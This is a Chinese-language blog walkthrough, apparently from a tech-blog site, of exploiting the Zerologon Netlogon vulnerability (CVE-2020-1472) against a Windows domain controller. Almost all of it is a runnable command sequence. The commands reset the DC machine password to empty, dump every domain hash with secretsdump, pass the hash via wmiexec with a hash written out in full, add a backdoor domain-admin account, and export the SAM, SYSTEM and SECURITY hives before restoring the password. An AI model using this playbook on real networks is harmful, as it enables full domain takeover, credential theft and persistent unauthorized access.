Netlogon漏洞复现
Netlogon这个漏洞很特别,只要是内网非域环境下,能访问到域控就能直接打。影响的windows版本也很广,从win08到win19。
- Netlogon攻击的思路
poc探测→重置密码→空密码导出域内hash→利用域管hash登陆→取出3个save文件→取出MACHINE.ACC值→恢复密码
- 攻击路线如下:
挂上代理之后,通过信息收集获取内网主机1.1.1.20
通过端口扫描发现,该主机开放了88端口和53端口,一般域控都会开启dns和88端口的krb协议,并且445端口中探测出来存在GOD域,主机名为OWA。
所以考虑内网尝试一下打Netlogon,考虑到入口的主机是linux,不像windows那样比较方便的获取主机名,并且确定一下漏扫是否有误报,所以用OXID获取主机名,确认是owa无误。
利用CVE-2020-1472的poc打过去,返回是 Success。确认是存在漏洞,可以进一步获取域管权限
python zerologon_tester.py owa 1.1.1.20
利用https://github.com/risksense/zerologon中的脚本把域控密码清零。
python set_empty_pw.py owa 1.1.1.20
Success!字段就是打成功了。如果失败的话,会有延时的英文字段
在kali中安装好impacket包
项目地址:https://github.com/SecureAuthCorp/impacket
git clone https://github.com/CoreSecurity/impacket.git
cd impacket/
python setup.py install
安装好impacket包之后,利用从impacket中的secretsdump脚本(在examples目录下) NTDS.DIT文件远程dump域内所有密码哈希。Kali走上代理流量直接打
proxychains python secretsdump.py god.org/'owa$'@1.1.1.20 -no-pass
利用域管的哈希横向过去
python .\wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ed74a5f9126e59fad90675a5df9650c4 god.org/administrator@1.1.1.20
横向获取了域管权限之后,直接添加一波域管
net user aufeng root@123 /add /domain
net group "domain admins" aufeng /add /domain
再查看,确定是domain admins权限。
为了防止出现脱域的情况,需要恢复一波账户密码,步骤如下
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save
但有时候会出现其他的情况,例如
但是这个时候,可以把save后缀修改为其他后缀,导出来后再修复为save就可以
把3个save文件都放置在secretsdump脚本的目录下,获取MACHINE.ACC的哈希值
python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
然后再利用reinstall_original_pw脚本恢复域控的密码。
python .\reinstall_original_pw.py owa 1.1.1.20 ed2fc29a9f837ab4c44535d2a2545861
再检测一下是否空密码可以登陆,如果失败了,那就是恢复密码成功
proxychains python secretsdump.py god.org/'owa$'@1.1.1.20 -no-pass
Netlogon漏洞复现相关推荐
- Netlogon 特权提升漏洞复现(CVE-2020-1472)
NetLogon 介绍 NetLogon 远程协议是一种在 Windows 域控上使用的 RPC 接口,被用于各种与用户和机器认证相关的任务.最常用于让用户使用 NTLM 协议登录服务器,也用于 NT ...
- 成功爬取CVE-2019-9766漏洞复现【CSDN】【1】
代码: import requests import bs4 from bs4 import BeautifulSoup import ress = '' headers = {'user-agent ...
- docker逃逸漏洞复现 cve-2019-5736
0x01 概述 2019年2月11日,runC的维护团队报告了一个新发现的漏洞,该漏洞最初由Adam Iwaniuk和Borys Poplawski发现.该漏洞编号为CVE-2019-5736,漏洞影 ...
- php 远程代码执行漏洞复现 cve-2019-11043
漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码. 向Nginx + PHP-FPM的服务 ...
- java struts2 漏洞复现合集
目录 一.S2-001复现 二.S2-005复现 三.S2-007复现 四.S2-008复现 五.S2-009复现 六.S2-012复现 七.S2-013复现 八.S2-015复现 九.S2-016复 ...
- Jenkins cve-2016-0792 漏洞复现 Xstream 反序列化漏洞
环境搭建 首先需要安装jenkins,这里使用的是1.642.1版本,其他版本可以自行下载,在官网和百度一开始都是没找到的,包括看了其他人的分析,但是都没有找到环境搭建,大部分是直接复现和poc分析 ...
- winrar远程代码执行漏洞复现(cve-2018-20250)
使用metasploit验证漏洞 1.漏洞影响 WinRAR < 5.70 Beta 1 Bandizip< = 6.2.0.0 好压(2345压缩) < = 5.9.8.10907 ...
- Typecho反序列化导致前台 getshell 漏洞复现
Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...
- Winrar目录穿越漏洞复现
Winrar目录穿越漏洞复现 1.漏洞概述 WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在Windows环境下的图形界面.2019年 2 月 20 日Check Point团队爆出了 ...
最新文章
- 【Scratch】青少年蓝桥杯_每日一题_8.09_列表
- python定义数组是带指针_在cython中声明numpy数组和c指针
- vscode自动格式化不符合eslint_VsCode(Visual Studio Code)格式化代码符合EsLint
- 线下实战—6月25号(深圳)
- (112)FPGA面试题-简述FPGA设计覆盖率问题
- JSONOBject的fluentPut(key,value)方法:可链式设置元素
- java spring框架文件上传_spring系列---Security 安全框架使用和文件上传FastDFS
- 定价越便宜,越赚钱?
- 双十一重磅福利来袭,拯救 “四大皆空” 的你!
- (转)mysql中InnoDB表为什么要建议用自增列做主键
- 如何手动合成年度夜间灯光影像
- 基于matlab直方图均衡,matlab 直方图均衡实验报告.pdf
- skimage 学习第二天:ski官网示例程序总结(1)
- fatal: The remote end hung up unexpectedly
- 多点相册--将手机的照片和视频备份到电脑的工具
- python基于PHP+MySQL的药店药品进销存管理系统
- impala shell
- Unity 阴影频闪的问题
- ampak正基RF定频安装指导
- 山东高考六选三学计算机选什么,山东省高中6选3选科数据出炉!和预想完全不一样,其他省区可参考!...
热门文章
- windows下使用vscode编写运行以及调试C/C++
- php开发微信手册,PHP技术开发微信公众平台
- win7系统无法开启telnet服务器,win7系统telnet出现错误怎么办?win7系统开启telnet出错的修复教程...
- Rhino是强大的专业3D造型软件
- 【问题】2.Bind for 0.0.0.0:8887 failed: port is already allocated错误
- 2022安全员-C证考试题库模拟考试平台操作
- gimp: 如何透明化背景
- 微信文章抓取:微信公众号文章抓取常识之临时链接、永久链接
- 摄像头poe供电原理_poe供电原理
- 获取html下拉菜单selected,原生js获取select下拉框的selected的option项